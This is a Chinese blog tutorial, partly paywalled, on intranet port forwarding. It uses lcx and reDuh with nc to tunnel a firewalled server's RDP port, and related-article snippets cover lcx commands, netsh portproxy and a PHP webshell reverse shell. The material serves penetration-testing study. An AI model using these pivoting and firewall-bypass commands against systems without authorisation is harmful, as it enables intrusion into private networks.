内网转发——反弹端口

最新推荐文章于 2025-09-29 22:11:27 发布
原创 最新推荐文章于 2025-09-29 22:11:27 发布 · 4.1k 阅读 · 11 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文详细介绍了多种内网穿透技术,包括lcx的正向和反向反弹端口实验,reduh、netsh、tunna工具的使用,以及ssh隧道的建立,用于在无法直接访问内网服务器时实现远程控制和数据传输。

反弹端口:是指受害者服务器的某一个端口不能访问,我们通过反弹端口的形式,让攻击者能够访问该端口,也叫端口转发

主要指以下情况:   -1.访问服务器的3389端口,由于防火墙的原因,我们访问不了3389端口
        原因:1.3389端口,防火墙没有开放
                   2.服务器处于公司内网,对外只发布了80端口
                   3.3389端口只允许内网连接
   -2.服务器处于公司内网,我们没有办法直接访问服务器

   -3.服务器处于公司内网,且无法与外网服务器直接通信,如何反弹shell 

实验一:lcx正向反弹端口实验

lcx工具有三种模式:
            1.listen监听
            2.tran 转发    将一个端口的流量转发到另一个端口
            3.slave  苦力  将一个外网端口和一个内网端口进行连接
lccx工具用法:lcx.exe -tran 1234(要监听的端口) 127.0.0.1 3389(转发的地址和端口)

实验环境:win2008

实验步骤:

1.将被控服务器的3389端口转发到本地的1234端口(本地端口转发)

  

2.外网服务器连接被控服务器的1234端口

  

实验二:reduh正向反弹的端口实验

实验环境:win2008开启防火墙,远程服务开启

实验步骤:

1.利用工具reduh(该工具可端口重用)

2.将reDuh.aspx放到攻击机的wwwroot目录下

3.进入direDuh-master\reDuhClient\dist文件夹,利用reDuhClient.jar工具

4.输入java -jar进入目录,继续输入:java -jar reDuhClient.jar aspx文件的路径 

  

5.重新打开一个命令行利用 nc对本地开放的1010端口进行配置,连接本地的1010端口,输入:nc.exe -nvv 127.0.0.1 1010

  

6.连上之后,创建隧道,以3389端口为例,将本地的6666端口通过80端口(web服务)连接远程的3389端口

  

8.远程连接本地的6666端口,输入用户名和密码即可远程连接成功

  

最低0.47元/天 解锁文章
内网转发——反弹shell
cxrpty的博客
03-16 1212
内网转发的目的: 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 代理方式: 正向代理:正向代理是服务器开放端口,客户端主动访问服务器的端口。正向代理的过程是它隐藏了真实的请求客户端,服务端不知道真实的客户端是谁,客户端请求的服务都被代理服务器代替来请求。 反向代理:反向代理是客户端开发端口,服务器连接客户端。反向代理是相对于服务...
内网渗透之——内网转发(反弹shell、端口、代理)
热门推荐
wsnbbz的博客
04-03 1万+
目的 渗透测试中,我们往往会面对十分复杂的内网环境,比如最常用的防火墙,它会限制特定端口的数据包出入。 需要转发的情况 1.A可以访问B的80端口,但是不能访问B的3389端口。 2.A可以访问B,B可以访问C,但是A不可以访问C,需要通过B转发数据,让A和C进行通信。 代理方式 正向代理 正向代理是客户端主动访问服务器的端口 我们常说的代理就是指正向代理,正向代理的过程,它...
代理转发&端口转发
最新发布
2401_88235966的博客
09-29 1138
web看腻了,我们就看一下内网的内容吧,内网渗透中有一个很重要的点,就是代理转发,怎么一层一层从边界主机一步一步访问到更深层的内网,这是每个渗透人员必须掌握的事情。
端口复用/重用反弹shell
04-14
端口复用/重用反弹shell 可以利用系统已经开启的端口,如:139,445,1025等。
反弹端口原理与HTTP隧道技术
天元喜羊羊的博客
08-20 1638
http://blog.163.com/feiqiu_13/blog/static/16870088920108123110438/ 现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网
远程控制编程之反弹端口模式
08-28 2575
 远程控制软件的上线模式主要有两种:正向直连模式与反弹端口模式。正向直连模式远控需要输入对方的IP地址和端口(图1),比如Radmin就是正向连接。当被控端是ADSL拨号这种动态IP或者需要监控的机器比较多的话,一个个输入IP和端口是繁琐和不准确的。这时,聪明的远程控制软件开发者们设计了反弹端口模式(图2),比如常见的灰鸽子,PcShare等远控都使用了这个模式。这个模式主要用于两个目的,一是解决
内网转发反弹端口
broing55的博客
03-17 992
反弹端口实验 实验环境:windows 2008r2服务器 和 本机 实验步骤 win2008服务器开启防火墙,开启3389端口并不对外开放,利用reduh工具使其服务器将其他端口公用。 本地计算机关闭防火墙和杀毒软件,安装java环境和jdk服务 实验流程: 配置虚拟机环境,将远程控制打开 然后将reduh中的aspx文件上传到wwwroot下面 然后本机计算机访问一下...
内网内网转发】——代理转发_ew(Earthworm)代理转发
weixin_45588247的博客
09-11 7218
文章目录一、实验环境:二、工具:三、概念:四、学习目的:五、ew(Earthworm)介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP):1. 场景:2. 网络拓扑图:3. 说明:4. 实验过程:八、ew(Earthworm)反向代理:1. 一级代理:1.1 场景:1.2 网络拓扑图:1.3 说明:1.4 实验过程:2. 二级代理(一):2.1 场景:2.2 网络拓扑图:2.3 说明:2.4 实验过程: 一、实验环境: 角色 系统
内网内网转发】——http协议代理转发_reGeorg代理转发
weixin_45588247的博客
09-15 3842
01【内网内网转发】——http协议代理转发_reGeorg代理转发 文章目录01【内网内网转发】——http协议代理转发_reGeorg代理转发一、环境准备:二、工具:三、概念:四、学习目的:五、reGeorg介绍:六、ew(Earthworm)使用说明:七、ew(Earthworm)正向代理(适用于被控服务器拥有一个公网IP): 一、环境准备:   关闭靶机电脑的防火墙及病毒和威胁防护的实时防护。   开启内网主机的远程桌面。   在被控服务器windows2008上面安装IIS服务器。 二、工
Linux下内网反弹技巧总结与杂谈
u014389734的博客
07-08 1106
靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发或映射等方式对外,当可以执行命令的服务器能够访问公网(这个要看具体情况,比如需要加载公网资源或者其他需求)时,反连技巧就会派上用场。通常,在做渗透的时候会“运气好”,碰到某些应用上存在远程命令执行漏洞,近来由于java反序列化和二进制类漏洞的层出不穷,也加持着这种漏洞越发增多。一般来说,靠谱点的公司都不会将应用服务器直接对外,而是通过代理转发...
反弹端口 HTTP代理 HTTP隧道技术
whatday的专栏
10-17 5898
现在,很多木马都利用了“反弹端口原理”与“HTTP隧道技术”,它的服务端(被控制端)会主动连接客户端(控制 端),因此,在互联网上可以访问到局域网里通过NAT代理(透明代理)上网的电脑,可以穿过防火墙( 包括:包过滤型及代理型防火墙) ,并且支持所有的上网方式,只要能浏览网页的电脑,这种木马都可以访问到,那么我们有必要了解一下此类木马用到的相关技术。      反弹端口原理:   
利用socket转发反弹端口技术突破防火墙进入内
杨德龙的专栏
04-25 3970
 http://www.vfocus.net/art/index_f.htmlTCP端口反弹技术? 反弹技术,该技术解决了传统的远程控制软件不能访问装有防火墙和控制局域网内部的远程计算机的难题。反弹端口型软件的原理是,客户端首先登录到FTP服务器,编辑在木马软件中预先设置的主页空间上面的一个文件,并打开端口监听,等待服务端的连接,服务端定期用HTTP协议读取这个文件的内容,当发现是客户端让
流量映射端口反弹
niqiu320的博客
05-26 1015
实验1:LCX端口转发 正向转发 内网主机执行:lcx.exe –slave 公网主机IP 公网主机端口 内网主机IP 内网主机端口 外网主机执行:Lcx.exe –listen 公网主机端口1 公网主机端口2 反向转发 外网主机执行:Lcx.exe -tran 53 目标主机IP 3389 试验二:PORTMAP端口转发 正向转发 内网主机执行:./portmap -m 3 -h1 127.0.0.1 -p1 22 -h2 公网主机ip -p2 6666 外网主机执行:./por
Socks代理反弹突破内网(freebuf)
cnbird's blog
09-02 4487
随着信息安全意识的提升,越来越多的信息系统前端均部署有防火墙,系统管理员根据业务需求将内部必要的服务端口通过端口映射等手段映射到公网中,如默认web服务端口80、MSSQL数据库服务端口1433等。通过部署防火墙可以将信息系统内部区域与公网逻辑隔离开来,利用相关的策略有效避免或减轻来自外部的攻击。 对于渗透测试者来说,如何绕过防火墙的阻挡在内网展开渗透测试成为亟需解决的问题,本文介绍了在夺取映射
内网反弹到外网,任意连接....
weixin_30952103的博客
09-04 211
内网反弹到外网.我想到外网连接到内网的机器任意端口.如内网反弹到外网,再连接到内网的指定端品如远程桌面3386. 转载于:https://www.cnblogs.com/guola/archive/2006/09/04/493999.html...
反弹端口型木马
rongwenbin的专栏
04-25 4610
首先要知道反弹端口的原理: 简单地说,就是由木马的服务端主动连接客户端所在IP对应的电脑的80端口。相信没有哪个防火墙会拦截这样的连接(因为它们一般认为这是用户在浏览网页),所以反弹端口型木马可以穿墙。 以下是在“网络神偷”的介绍中挖下来的:道高一尺、魔高一丈,不知哪位高人分析了防火墙的特性后发现:防火墙对于连入的连接往往会进行非常严格的过滤,但是对于连出的连接却疏于防范。于是,与一般的软件相
php反弹,PHP Webshell 下的端口反弹方法
weixin_29421409的博客
03-10 402
使用方法:需要将以下代码保存为一个单独的php文件。上传到服务器之后,本地NC监听一个端口,在代码里设置好反弹IP和端口,然后直接访问上传的php文件,就会给 NC 弹回来一个shell。测试实例:先在本地执行 nc -vv -l -p port,然后访问这个php页面 http://www.site.com/phpdkft.php ,本地就会得到一个反弹的shell。这样每次可以直接访问这个ph...
网络安全编程:木马的配置生成与反弹端口技术
ewii12567的博客
09-26 1155
由于黑色产业链的供需关系,木马、病毒等恶意程序作为商品在网络上有着大量的交易,因此这些恶意程序必须具备灵活的可配置性。当然,即使是免费提供的木马、病毒等恶意程序,为了可以让广大的黑友去使用,它也是具备可配置性的。因此,恶意程序的可配置性已经成为最基本的功能之一。拿木马来说,木马要进行配置后才可以生成真正的服务器端,也就是被控制端是经过配置后产生的。来看一下灰鸽子(灰鸽子是国产著名的远程控制软件)服务器端的配置界面,如图1所示。图1 灰鸽子服务器端配置界面。
内网渗透-反弹Shell
道阻且长,行则将至
07-07 3711
概述 反弹shell(reverse shell),就是控制端监听在某TCP/UDP端口,被控端发起请求到该端口,并将其命令行的输入输出转到控制端。reverse shell与telnet,ssh等标准shell对应,本质上是网络概念的客户端与服务端的角色反转。 为什么要反弹shell? 通常用于被控端因防火墙受限、权限不足、端口被占用等情形。举例:假设我们攻击了一台机器,打开了该机器的一个端口,攻击者在自己的机器去连接目标机器(目标ip:目标机器端口),这是比较常规的形式,我们叫做正向连接。远程桌面、we
shell 语言 双网卡端口转发
08-12
在shell语言中,可以使用netsh命令来实现双网卡端口转发。首先,你需要使用netsh命令来配置网络端口转发。可以使用以下命令创建一个本地端口到远程端口的转发规则: ``` netsh interface portproxy add v4tov4 listenaddress=localaddress listenport=localport connectaddress=destaddress connectport=destport ``` 其中,`listenaddress`和`localport`是本地端口的地址和端口号,`connectaddress`和`connectport`是远程计算机的地址和端口号。这个命令将会将所有传入到本地端口的TCP连接重定向到远程计算机上的端口。<span class="em">1</span><span class="em">2</span><span class="em">3</span> #### 引用[.reference_title] - *1* [内网转发之Netsh端口转发的使用学习](https://blog.youkuaiyun.com/weixin_41598660/article/details/106487183)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *2* [流量转发之端口转发](https://blog.youkuaiyun.com/qingzhantianxia/article/details/121956966)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] - *3* [内网渗透之——内网转发(反弹shell、端口、代理)](https://blog.youkuaiyun.com/wsnbbz/article/details/104893482)[target="_blank" data-report-click={"spm":"1018.2226.3001.9630","extra":{"utm_source":"vip_chatgpt_common_search_pc_result","utm_medium":"distribute.pc_search_result.none-task-cask-2~all~insert_cask~default-1-null.142^v92^chatsearchT0_1"}}] [.reference_item style="max-width: 33.333333333333336%"] [ .reference_list ]
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值